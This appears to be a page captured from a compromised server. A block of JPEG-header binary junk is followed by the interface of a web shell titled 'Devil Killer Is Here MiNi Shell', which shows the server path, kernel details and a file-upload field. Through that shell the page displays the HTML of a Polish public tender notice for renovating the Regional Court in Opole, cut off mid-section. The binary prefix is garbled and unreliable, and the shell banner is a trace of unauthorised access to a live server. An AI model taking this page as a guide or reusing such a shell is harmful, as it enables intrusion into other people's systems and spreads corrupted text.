JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230308/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230308/0012576501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont i przebudowa części pomieszczeń wraz z remontem instalacji c.o. w budynku Sądu Okręgowego w Opolu przy pl. Daszyńskiego 1 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Sąd Okręgowy w Opolu</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Sąd Okręgowy w Opolu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000323660</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Daszyńskiego 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-064</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@opole.so.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.opole.so.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ kontroli państwowej i ochrony prawa oraz sąd i trybunał</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Wymiar sprawiedliwości </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont i przebudowa części pomieszczeń wraz z remontem instalacji c.o. w budynku Sądu Okręgowego w Opolu przy pl. Daszyńskiego 1 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c5b80130-bd7f-11ed-b311-9aae6ad31be8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00125765</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00123497/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Remont i przebudowa części pomieszczeń wraz z remontem instalacji c.o. w budynku Sądu Okręgowego w Opolu przy pl. Daszyńskiego 1</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c5b80130-bd7f-11ed-b311-9aae6ad31be8 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń odbywa się<br/>przy użyciu Platformy dostępnej pod adresem https//:ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń odbywa się przy użyciu Platformy.<br/>2. Platforma jest dostępna pod adresem: https://ezamowienia.gov.pl<br/>3. W sytuacji awarii lub błędów lub niedostępności Platformy uniemożliwiających komunikację Wykonawcy z Zamawiającym poprzez<br/>Platformę, Wykonawca zobowiązany jest niezwłocznie zgłosić ten fakt Zamawiającemu za pomocą poczty elektronicznej na adres:<br/>przetargi@opole.so.gov.pl , pod rygorem utraty prawa powoływania się na konsekwencje awarii lub błędów lub niedostępności Platformy w toku niniejszego postępowania.<br/>4. Oferta musi być podpisana kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym przez osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy.<br/>5. Pozostałe informacje zostały określone w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna RODO stanowi Załącznik do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">G-2502-2/23</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia są roboty budowlane obejmujące: „Remont i przebudowę części pomieszczeń wraz z remontem instalacji c.o. w budynku Sądu Okręgowego w Opolu przy pl. Daszyńskiego 1” stanowiące przedmiot zamówienia będą wykonane w czynnym budynku, objętym decyzjami o pozwoleniu na budowę – Decyzją Nr 267/18 z dnia 03.04.2018r. dotyczącą przebudowy budynku Sądu Okręgowego w Opolu przy placu Daszyńskiego 1 oraz Decyzją Nr 202/22 z dnia 28.04.2022r. dotyczącą przebudowy instalacji centralnego ogrzewania w budynku Sądu Okręgowego w Opolu, które obejmują realizację przedmiotu zamówienia.<br/>2. Opis przedmiotu zamówienia:<br/>2.1. Szczegółowy opis przedmiotu zamówienia obejmujący: zakres, charakterystykę robót oraz parametry techniczne, został określony w dokumentacjach projektowych oraz przedmiarze robót. Przedmiar robót stanowi dokument pomocniczy do wyceny oferty.<br/>2.2. Przedmiot zamówienia obejmuje między innymi następujący zakres robót:<br/>a) rozbiórkę starych posadzek i okładzin ściennych wraz z wykonaniem podkładów i izolacji;<br/>b) niezbędne rozbiórki, wykucia i przebicia ścian i stropów;<br/>c) przebudowa instalacji c.o.;<br/>d) roboty tynkarskie np.: naprawy tynków istniejących ścian, wykonanie nowych tynków, wykonanie gładzi, wykonanie nowych okładzin ściennych, obudów z płyt gipsowo-kartonowych itp.;<br/>e) wykonanie nowych ścian wewnętrznych;<br/>f) wykonanie nowych posadzek;<br/>g) demontaże i rozbiórki oraz wykonanie nowych instalacji wod.–kan. wraz z białym montażem;<br/>h) demontaż i wykonanie nowych instalacji elektrycznych, logicznych i telefonicznych (wraz z osprzętem);<br/>i) demontaż, montaż i wymiana stolarki drzwiowej;<br/>j) roboty malarskie;<br/>k) inne elementy nie wymienione niezbędne do wykonania remontu i przebudowy budynku uzgodnione z Zamawiającym w trakcie wykonywania robót.<br/>2.3. Zamawiający, wymaga zatrudnienia przez wykonawcę, podwykonawcę lub dalszego podwykonawcę na podstawie umowy o pracę osób wykonujących czynności służące realizacji przedmiotu zamówienia, których wykonanie polega na wykonywaniu pracy w sposób określony w art. 22 § 1 Kodeksu Pracy.<br/>2.4. Zgodnie z art. 22 § 1 Kodeksu Pracy: przez nawiązanie stosunku pracy pracownik zobowiązuje się do wykonywania pracy określonego rodzaju na rzecz pracodawcy i pod jego kierownictwem oraz w miejscu i czasie wyznaczonym przez pracodawcę, a pracodawca do zatrudniania pracownika za wynagrodzeniem.<br/>2.5. Zamawiający wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie umowy o pracę przez cały okres realizacji zamówienia osób wykonujących następujące czynności w zakresie realizacji zamówienia: <br/>	roboty ogólnobudowlane, roboty elektryczne, roboty sanitarne<br/>2.6. Uprawnienia Zamawiającego w zakresie weryfikacji i kontroli spełniania przez wykonawcę wymagań, oraz sankcje z tytułu niespełnienia wymagań w zakresie zatrudnienia – zgodnie Projektem Umowy.<br/>2.7. Materiały, narzędzia, urządzenia, sprzęt niezbędny do realizacji przedmiotu zamówienia, Wykonawca dostarczy i zużyje zgodnie ze złożoną ofertą warunkującą wykonanie przedmiotu zamówienia. Wszystkie materiały użyte do wykonania przedmiotu zamówienia:<br/>a) muszą odpowiadać wymaganiom Zamawiającego określonym w dokumentacji, o której mowa w Projekcie Umowy;<br/>b) muszą spełniać wymogi Prawa budowlanego i Ustawy o wyrobach budowlanych;<br/>c) muszą być dopuszczone do obrotu i stosowania w budownictwie, zgodnie z art. 10 Prawa budowlanego;<br/>d) muszą posiadać odpowiednie certyfikaty na znak bezpieczeństwa, być zgodne z kryteriami technicznymi określonymi w Polskich Normach lub aprobatach technicznych, o ile dla danego wyrobu nie ustalono Polskiej Normy,<br/>e) muszą być fabrycznie nowe, nie używane oraz muszą posiadać gwarancję producenta.<br/>2.8. Zamawiający zapewni Wykonawcy nieodpłatny dostęp do źródła poboru wody i energii elektrycznej.<br/>2.9. Zamawiający udostępni Wykonawcy pomieszczenia w Budynku, w celu umożliwienia wykonania przedmiotu umowy.<br/>2.10. Z uwagi na szczególny charakter działalności Sądu Okręgowego w Opolu i wykonywanie prac w obiekcie użyteczności publicznej, niektóre prace i tzw. „ prace głośne”, tzn. zakłócające normalne funkcjonowanie pracy Sądu Okręgowego w Opolu Wykonawca będzie wykonywał w godzinach popołudniowych, tj. po godzinie 15:30 – po zakończeniu godzin urzędowaniu Sądu Okręgowego w Opolu maksymalnie do godziny 20.00 lub w wyjątkowych wpadkach w dni, które są dla Sądu Okręgowego w Opolu dniami wolnymi od pracy. Dokładny termin (dzień, godzinę) tych prac Wykonawca zobowiązany jest uzgodnić z Zamawiającym na co najmniej dwa dni przed terminem wykonywania tych robót.<br/>2.11. W czasie realizacji robót wykonawca będzie utrzymywał pomieszczenia poza pomieszczeniami, które objęte zostaną remontem w stanie wolnym od przeszkód komunikacyjnych oraz będzie usuwał na bieżąco wszelkie zbędne materiały, odpady i śmieci oraz inne zanieczyszczenia powstałe w wyniku realizacji przedmiotu zamówienia.<br/>2.12. Wykonawca zobowiązuje się: strzec mienia znajdującego się na terenie budynku, wykonać odpowiednie zabezpieczenie miejsca prowadzonych robót, wykonywać roboty zgodnie z przepisami bhp i ppoż, a także nie naruszać w trakcie prowadzonych robót budowlanych istniejącej struktury budynku i instalacji nie objętych zakresem robót stanowiących przedmiot umowy, bez zgody Zamawiającego pod rygorem poniesienia z tego tytułu przez Wykonawcę skutków finansowych.<br/>2.13. Wymagany minimalny okres gwarancji jakości i rękojmi za wady na wykonanie przedmiotu zamówienia wynosi 24 miesiące licząc od bezusterkowego odbioru przedmiotu umowy.<br/>2.14. Oferowane roboty budowlane muszą odpowiadać wymaganiom Zamawiającego opisanym w dokumentacji, o której mowa w Rozdziale III SWZ, wymaganiom technologiczno–materiałowym producentów materiałów oraz sztuce budowlanej, zgodnie z wszelkimi obowiązującymi aktami prawnymi i normami właściwymi w przedmiocie zamówienia i na warunkach zawartych w Projekcie umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45111220-6 - Roboty w zakresie usuwania gruzu</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45324000-4 - Roboty w zakresie okładziny tynkowej</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45421152-4 - Instalowanie ścianek działowych</p> <p class="mb-0">45421146-9 - Instalowanie sufitów podwieszanych</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45432114-6 - Roboty w zakresie podłóg drewnianych</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45312100-8 - Instalowanie przeciwpożarowych systemów alarmowych</p> <p class="mb-0">45312200-9 - Instalowanie przeciwwłamaniowych systemów alarmowych</p> <p class="mb-0">45314310-7 - Układanie kabli</p> <p class="mb-0">45314320-0 - Instalowanie okablowania komputerowego</p> <p class="mb-0">45315300-1 - Instalacje zasilania elektrycznego</p> <p class="mb-0">45315600-4 - Instalacje niskiego napięcia</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">175 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja na wykonanie przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym – Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga wpisu do rejestrów zawodowych lub handlowych. Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku, oprócz Oświadczenia, na podstawie którego przeprowadzi ocenę spełnienia warunku;<br/>b) wymaganych uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej – Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień. Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku oprócz Oświadczenia, na podstawie którego przeprowadzi ocenę spełnienia warunku;<br/>c) sytuacji ekonomicznej i finansowej – Zamawiający nie stawia szczegółowych wymagań w zakresie spełnienia tego warunku, oprócz Oświadczenia, na podstawie którego przeprowadzi ocenę spełnienia warunku;<br/>d) zdolności technicznej lub zawodowej:<br/>- Warunek ten zostanie spełniony jeżeli Wykonawca dysponuje osobami skierowanymi do realizacji zamówienia publicznego i wskaże te osoby wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nich czynności, oraz informację o podstawie do dysponowania tymi osobami.<br/>Potwierdzeniem spełnienia warunku będzie sporządzenie Wykazu osób zawierającego min.:<br/>a) 1 osobę – kierownika budowy, który posiada uprawnienia budowlane w specjalności konstrukcyjno – budowlanej bez ograniczeń do kierowania robotami budowlanymi oraz posiada co najmniej 18–miesięczną praktykę na budowie przy zabytkach nieruchomych, bądź posiada uprawnienia do prowadzenia prac w obiektach zabytkowych potwierdzone stosownym zaświadczeniem Wojewódzkiego Konserwatora Zabytków, zgodnie z art. 37c ustawy o ochronie zabytków i opiece nad zabytkami;<br/>b) 1 osobę – kierownika robót elektrycznych, który posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych zgodnie z przepisami ustawy Prawo Budowlane i Rozporządzeniem w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie lub im odpowiadające, ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/>c) 1 osobę – kierownika robót sanitarnych, który posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych zgodnie z przepisami ustawy Prawo Budowlane i Rozporządzeniem w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie lub im odpowiadające, ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów;<br/>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonał roboty budowlane odpowiadające rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie.<br/>Potwierdzeniem spełnienia warunku będzie przedstawienie Wykazu robót budowlanych spełniających warunki określone przez Zamawiającego tj.:<br/>Za odpowiadające rodzajem Zamawiający uzna wykonane należycie przez jeden podmiot min. dwie roboty budowlane, których przedmiotem były roboty ogólnobudowlane, przy czym wartość w/w robót budowlanych nie jest mniejsza niż 200 000,00 zł brutto każda. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie Wykonawcy – Grupa kapitałowa, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę lub ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej.<br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców Oświadczenie Wykonawcy–Grupa kapitałowa, składa każdy z wykonawców wspólnie ubiegających się o zamówienie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w 